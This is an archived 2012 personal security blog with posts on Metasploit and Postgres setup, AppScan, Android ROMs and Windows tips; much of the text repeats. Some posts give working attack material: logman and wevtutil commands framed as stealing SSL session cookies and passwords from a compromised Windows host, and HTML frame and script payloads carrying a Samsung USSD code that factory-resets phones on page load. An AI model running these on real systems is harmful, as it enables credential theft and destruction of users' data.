AppScan comes with nine (9) predefined policies. Below summarizes the types of tests that are included in each predefined policy.
 |
| Test Policy Categories |
Dec 4, 2012
AppScan Policies
IBM Security AppScan is an automated dynamic security testing tool. It runs various tests that probe for known vulnerabilities and weaknesses and formats the results into reports to help you understand the vulnerabilities in your applications.
AppScan comes with nine (9) predefined policies. Below summarizes the types of tests that are included in each predefined policy.
AppScan comes with nine (9) predefined policies. Below summarizes the types of tests that are included in each predefined policy.
Oct 16, 2012
Metasploit and Postgres Setup
Tags:
msf
Here are some notes that I took to setup my msf and postgres.
Starting Postgres
Creating a database user
Creating a database
Configure Metasploit
Enable the database on startup
This is to write the database configuration to a separate configuration file so the password doesn't get printed on the screen during each start of the msfconsole.
Using the database
To assign ownership of a database
To add or change the password for a user
To drop a database
To drop a user
Starting Postgres
rt@bt:$ sudo -s
rt@bt:$ postgresql-setup initdb
rt@bt:$ systemctl start postgresql.service
Creating a database user
postgres@bt:$ createuser msf_user -P
Enter password for new role: <btpassword>
Enter it again: <btpassword>
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
Creating a database
postgres@bt:$ createdb --owner=msf_user msf_database
Configure Metasploit
rt@bt:$ msfconsole
msf > db_status
[*] postgresql selected, no connection
msf> db_connect msf_user:btpassword@127.0.0.1:5432/msf_database
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
[..]
NOTICE: CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"
Enable the database on startup
This is to write the database configuration to a separate configuration file so the password doesn't get printed on the screen during each start of the msfconsole.
$ cat > /opt/metasploit-framework/database.yml << EOFDatabase connection and Workspace
production:
adapter: postgresql
database: msf_database
username: msf_user
password: yourmsfpassword
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
EOF
$ cat > ~/.msf4/msfconsole.rc << EOF
db_connect -y /opt/metasploit4/config/database.yml
workspace -a YourProject
EOF
Using the database
msf > db_status
[*] postgresql connected to msf_database
msf > db_nmap 192.168.1.0/24
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.1 11:22:33:44:55:66 router Linux 2.6.X device
192.168.1.100 22:33:44:55:66:77 mixer Linux 2.6.X device
msf > help databaseTo list databases
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
postgres@bt:$ psql -l
To assign ownership of a database
postgres@bt:$ psql -c "ALTER DATABASE msf_database OWNER TO msf_user;"
To add or change the password for a user
postgres@bt:$ psql -c "ALTER USER msf_user WITH ENCRYPTED PASSWORD 'omgwtfbbq';"
To drop a database
postgres@bt:$ dropdb msf_database
To drop a user
postgres@bt:$ dropuser msf_userpsql commands
select version(); - show the db version
\h - get help
\q - quit
Oct 13, 2012
Setting Up Metasploit Framework
Tags:
metasploit,
msf
I just setup my Metasploit Framework on my Ubuntu 12.04 (LTS). Below is the note of what I have been busy with recently.
Installing the dependencies
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev subversion openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3
sudo gem install wirble msgpack sqlite3 pg activerecord nokogiri
Installing NMAP
mkdir ~/Development
cd ~/Development
svn co https://svn.nmap.org/nmap
cd nmap
./configure
make
sudo make install
make clean
Setting up Postgres SQL Server
sudo -s
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit
Installing Metasploit Framework
cd /opt
sudo svn co https://www.metasploit.com/svn/framework3/trunk metasploit-framework
cd metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
sudo ln -s /opt/metasploit-framework/armitage /usr/local/bin/armitage
cd /opt/metasploit-framework/
cat > database.yml << EOF
>production:
> adapter: postgresql
> database: msf
> username: msf
> password:
> host: 127.0.0.1
> port: 5432
> pool: 75
> timeout: 5
>EOF
sudo echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/database.yml >> /etc/profile
source /etc/profile
cd /opt/metasploit-framework/external/pcaprub
sudo ruby extconf.rb && sudo make && sudo make install
First Run
msfconsole
Oct 10, 2012
Black Screen when Remote Desktop Connection (RDC)
This morning, I connect to my remote server (windows 7 64-bit) via RDC (Remote Desktop Connection) as usual (after VPN authentication). And I get a "blank/black screen" after I key my login credential.
After a Google search, I found the solution to this. In case you have the similar issue, just hit Ctrl-Alt-End on the black screen to bring the Task Manager up. Problem solved!!
After a Google search, I found the solution to this. In case you have the similar issue, just hit Ctrl-Alt-End on the black screen to bring the Task Manager up. Problem solved!!
Oct 5, 2012
Introducing FakeNet
FakeNet is Windows network simulation tool designed for malware analysis. It redirects all traffic leaving a machine to the localhost (including hard-coded IP traffic and DNS traffic) and implements several protocols to ensure that malicious code continues to execute and can be observed by an analyst.
The tool supports DNS, HTTP, and SSL protocols and provides a python extension interface for implementing new or custom protocols. It also the capability to listen for traffic to any port as well as create packet capture on the localhost.
Right now the tool only supports WinXP Service Pack 3. The tool runs fine on Windows Vista/7 although certain features will be automatically disabled.
Links:
Oct 2, 2012
EXEInfo PE
Here's a new tool that I discovered recently that able to identify common packers. It is similar to PEiD that I used.
Goto http://www.exeinfo.antserve.com/ to get a freeware copy.
Goto http://www.exeinfo.antserve.com/ to get a freeware copy.
Sep 30, 2012
Unicode Filename in Windows 7
Today, out of sudden, my Windows 7 seems does not display unicode filename anymore in Windows Explorer. It doesn't help even I reboot my laptop multiple times.
After searching on the web, it seems like to solution is simple.
After searching on the web, it seems like to solution is simple.
- Goto c:\windows\fonts
- Right click on the "Ming Liu" font and choose "Show".
- Reboot.
In order to prevent it happens again in the future:
- From "Start", type "control" to open the "Control Panel".
- At the top-right search box, type "fonts".
- Choose "View installed fonts".
- At the left pane, choose "Font settings".
- Uncheck "Hide fonts based on language settings".
Sep 25, 2012
Wipe out/Factory Reset Samsung Android’s Phones
A major security vulnerability has been disclosed at the Ekoparty 2012 Security Conference which affects Samsung Android handsets.
It it is possible to reset those handsets to factory default settings and in the process wipe out all data. This vulnerability exploits a “secret” code (actually is USSD code) that can be used to trigger the factory reset automatically, without asking any confirmation from the user. That code is: *2767*3855#
There are different methods known to date to push that code onto those handsets:
- SMS in Wap Push mode (where the user would have to click on a link)
- QR Code
- NFC Protocol
Or… if users go to some websites where either
<frame src="tel:*2767*3855%23" />or
<script>document.location="tel:*2767*3855%23";</script>is contained in the HTML page.
So far, it has been confirmed to work against the Samsung Galaxy S3, the Galaxy Beam, S Advance, Galaxy Ace and Galaxy S II and some HTC devices.
Sep 19, 2012
Data Mining Event Tracing for Windows 3
This is continue from the previous 2 posts.
The netsh utility has an interface to enable/disable event tracing for all providers that participate in a given "Scenario". You can tell it you want to use "All" scenarios which enables logging for a large number of providers at the same time.
To start/stop the trace session:
The netsh utility correlates "like events" and generates several log file and reports containing some interesting data.
As expected we have our "FIREEVERYTHING2.etl" file that we can query with wevtutil.exe. This file will have the information recorded from by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.
To check on human readable content:
Here is an example of searching for the "passwd" field in a gmail.com POST with and without the /f:Text option. With /f:Text it finds zero occurrence, but without it finds two.
These logs are not just recording actions taken by built in programs like Internet Explorer. Any third party tools that rely on the ETW enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!
The netsh utility has an interface to enable/disable event tracing for all providers that participate in a given "Scenario". You can tell it you want to use "All" scenarios which enables logging for a large number of providers at the same time.
To start/stop the trace session:
C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING2.etl capture=yes correlation=yes
Trace configuration:-------------------------------------------------------------------Status: RunningTrace File: FIREEVERYTHING2.etlAppend: OffCircular: OnMax Size: 250 MBReport: Off
C:\temp>netsh trace stopCorrelating traces ... doneGenerating data collection ... doneThe trace file and additional troubleshooting information have been compiled as "C:\temp\FIREEVERYTHING2.cab".File location = C:\temp\FIREEVERYTHING2.etlTracing session was successfully stopped.
The netsh utility correlates "like events" and generates several log file and reports containing some interesting data.
As expected we have our "FIREEVERYTHING2.etl" file that we can query with wevtutil.exe. This file will have the information recorded from by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.
To check on human readable content:
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | more
Here is an example of searching for the "passwd" field in a gmail.com POST with and without the /f:Text option. With /f:Text it finds zero occurrence, but without it finds two.
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | find /c /i "passwd"0C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True | find /c /i "passwd"2
These logs are not just recording actions taken by built in programs like Internet Explorer. Any third party tools that rely on the ETW enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!
Sep 18, 2012
Data Mining Event Tracing for Windows 2
This is continue from the previous post.
The logman utility can allow us to peer into and established SSL session and steal active session cookies after you have shell on a box.
If you do able to sniff the administrator credential, then you can evenenable logging on a remote host using "logman -s <computername>".
The Microsoft-Window-WinInet is only 1 of the providers that you can turn on the logging. To check the full list of providers in your computer, you can:
c:\temp>logman query providers > listofproviders.txt
C:\temp>type listofproviders.txt | find /c "{"
643
This means there are total of 643 providers available in my computer.
The logman utility can allow us to peer into and established SSL session and steal active session cookies after you have shell on a box.
If you do able to sniff the administrator credential, then you can evenenable logging on a remote host using "logman -s <computername>".
The Microsoft-Window-WinInet is only 1 of the providers that you can turn on the logging. To check the full list of providers in your computer, you can:
c:\temp>logman query providers > listofproviders.txt
C:\temp>type listofproviders.txt | find /c "{"
643
This means there are total of 643 providers available in my computer.
Sep 17, 2012
Data Mining Event Tracing for Windows
>>>> From http://pauldotcom.com/wiki/index.php/Episode300
This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).
The ETW Provider logs excesive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.
Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.
First, turn on the Event Tracing for WinInet.
From now on, all the WinInet connections and SSL sessions are logged.
To check the cookies:
To check the POST info (including password):
To check some additional reconnaissance:
To turn off your Event logging:
And remember to remove your "cookiesteal.etl" file.
This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).
The ETW Provider logs excesive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.
Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.
First, turn on the Event Tracing for WinInet.
c:\>cd \tempc:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets
From now on, all the WinInet connections and SSL sessions are logged.
To check the cookies:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"
To check the POST info (including password):
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"
To check some additional reconnaissance:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"
To turn off your Event logging:
c:\temp>logman stop CookieStealer -ets
And remember to remove your "cookiesteal.etl" file.
Sep 3, 2012
100 Years later from today...
Tags:
Doreamon
100 years later from today is the birth of Doreamon (小叮噹).
http://en.wikipedia.org/wiki/2112:_The_Birth_of_Doraemon
http://en.wikipedia.org/wiki/2112:_The_Birth_of_Doraemon
Aug 29, 2012
Aug 16, 2012
Upgrading BackTrack 5 R2 to BackTrack 5 R3 now
Tags:
bt5
BackTrack 5 R3 released on Aug 13, 2012. I'm upgrading my laptop from BackTrack 5 R2 to BackTrack 5 R3 now. Here's how I do it:
- apt-get update && apt-get dist-upgrade
- apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
Jul 30, 2012
Obtain Domain Controller list in AD
Here's a quick way to find find out the server name of the AD domain controller on your network.
c:\> nltest /dc:labs.example.org
If you are running on a Linux machine, you also can find out the server name and IP address in AD too.
$ nslookup -type=all _ldap._tcp.dc._msdcs.labs.example.org
$ dig @dns1.example.org _ldap._tcp.dc._msdcs.labs.example.org -t srv
$ dig @dns1.example.org _ldap._tcp.dc._msdcs.labs.example.org -t any
Jul 4, 2012
File and Folder Ending with Period/Dot
This is a small test on NTFS.
Usually there is no way for you to have file or folder name that ends with a "period" or "dot". For example, you create a new folder called "F1.", Windows OS will rename it to "F1".
One day, I save a PDF file to my Windows 7 (64-bit) from SANS (using Chrome), and for some reasons the file is saved as an ending "dot". And I can't open/del/ren/mov the file. I even try to remove the folder that contain the file but still fail.
After a quick search, here's what I found this, http://support.microsoft.com/kb/320081
But to have fun on this, you still can try.
To Create a File or Folder that ends with "dot":
To Remove a file or folder that ends with "dot":
Basically those files and folders can't be accessed at all. And you can't rename or move them. Have fun!
Usually there is no way for you to have file or folder name that ends with a "period" or "dot". For example, you create a new folder called "F1.", Windows OS will rename it to "F1".
One day, I save a PDF file to my Windows 7 (64-bit) from SANS (using Chrome), and for some reasons the file is saved as an ending "dot". And I can't open/del/ren/mov the file. I even try to remove the folder that contain the file but still fail.
After a quick search, here's what I found this, http://support.microsoft.com/kb/320081
But to have fun on this, you still can try.
To Create a File or Folder that ends with "dot":
c:\mkdir \\?\c:\folder.
c:\echo test > \\?\c:\file.
To Remove a file or folder that ends with "dot":
c:\rmdir \\?\c:\folder.
c:\del \\?\c:\file.
Basically those files and folders can't be accessed at all. And you can't rename or move them. Have fun!
Jun 4, 2012
Jun 1, 2012
Something Went Wrong in Facebook
 |
| Sorry, something went wrong |
May 21, 2012
AOKP ICS ROM + Matr1x Kernel
I quit from MIUI and switching to AOKP ROM. Now here's what running on my phone:
- AOKP ICS ROM build 36 - ROM Control.
- ICS ROM 4.04
- Matr1x kernel using CFSv19.5 (3.0.30)
 |
| AOKP ICS (Build 36) + Matr1x Kernel (cfs v19.5) |
May 17, 2012
App List Backup
Tags:
apk
Very often I switch out different ROMs for testing. Thus I need a simple way to re-download the list of apps from the Market.
 |
| App List Backup from Pun Software |
It helps me to save the list of installed apps so I can re-download them from the Market later (on the same or another device). Note that it does not backup my apps or data (settings).
https://play.google.com/store/apps/details?id=com.punsoftware.backup
May 6, 2012
中华万年历/中華萬年曆 + 桌面插件
Tags:
apk
 |
| 中華萬年曆 + 桌面插件 From DannyChou |
中华万年历/中華萬年曆(Chinese Lunar Calendar)是一款基於Google Android手機平台的完全免費的日曆軟體,提供1583年-2099年之間的西曆、農曆、干支歷、國際節日、農曆節氣、節氣查詢功能,支持簡體中文和繁體中文。
中华万年历/中華萬年曆(Chinese Lunar Calendar)桌面插件,配合中華萬年曆使用。
https://play.google.com/store/apps/details?id=com.keenvim.cnCalendar
https://play.google.com/store/apps/details?id=com.keenvim.cnCalendar.Plugin.appwidget
AirDroid
Tags:
apk
 |
| AirDroid From SAND Studio |
Its features include but not limited to files mgmt, SMS mgmt, apps mgmt, photos mgmt, share clipboard, contact mgmt, ringtones/music mgmt, etc.
The new features include https support, taking screenshot, and a lot more.
https://play.google.com/store/apps/details?id=com.sand.airdroid
AfterFocus
Tags:
apk
 |
| AfterFocus From MotionOne |
With AfterFocus, you can create DSLR-style background blurred photo by simply selecting focus area. Also, various filter effects offer you to create the most natural and realistic photo.
Selecting a focus area more precisely, you can achieve more natural and professional image. Just mark the areas you want, AfterFocus automatically recognizes the focus area precisely even for an object with complex shapes.
https://play.google.com/store/apps/details?id=com.motionone.afterfocus
May 5, 2012
MIUI 2.4.27 + Android ICS 4.0.4
Today, my phone is running on MIUI 2.4.27 and Android ICS 4.0.4. Here's the home screen.
 |
| MIUI 2.4.27 + Android ICS 4.0.4 |
MIUI 2.3.23 + ICS 4.0.3
Back in March 27, 2012, I've abandoned CM9 and move to MIUI. Here's the screenshot of the lockscreen.
 |
| MIUI 2.3.23 + ICS 4.0.3 |
CM9 + ICS 4.0.3
I've upgrade my phone to CM9, running Android 4.0.3 back in March 5, 2012.
 |
| CM9 + ICS 4.0.3 |
May 4, 2012
New Design Template
Tags:
adm
Hi all.
Due to some unforeseen issue caused by Google, I was not able to update my blog since February. However, I've found a solution to my problem and I'll continue to update my blog starting this month.
Thank for the support.
--
Jet
Due to some unforeseen issue caused by Google, I was not able to update my blog since February. However, I've found a solution to my problem and I'll continue to update my blog starting this month.
Thank for the support.
--
Jet
Jan 26, 2012
Change IP Address and DNS settings
I've shown how to add multiple IP addresses in Windows 7 before. Today, let's go back to basic.
Set a static IP address on NIC:
netsh interface ip set address name=”Local Area Connection” static 192.168.1.100 255.255.255.0 192.168.1.1
Set to DHCP:
netsh interface ip set address name=”Local Area Connection” source=dhcp
Set the primary DNS and secondary DNS settings:
netsh interface ip set dns name=”Local Area Connection” static 192.168.1.1
netsh interface ip add dns name=”Local Area Connection” 8.8.8.8 index=2
Set the DNS setting to DHCP:
netsh interface ip set dnsservers name=”Local Area Connection” source=dhcp
Set a static IP address on NIC:
netsh interface ip set address name=”Local Area Connection” static 192.168.1.100 255.255.255.0 192.168.1.1
Set to DHCP:
netsh interface ip set address name=”Local Area Connection” source=dhcp
Set the primary DNS and secondary DNS settings:
netsh interface ip set dns name=”Local Area Connection” static 192.168.1.1
netsh interface ip add dns name=”Local Area Connection” 8.8.8.8 index=2
Set the DNS setting to DHCP:
netsh interface ip set dnsservers name=”Local Area Connection” source=dhcp
Subscribe to:
Posts (Atom)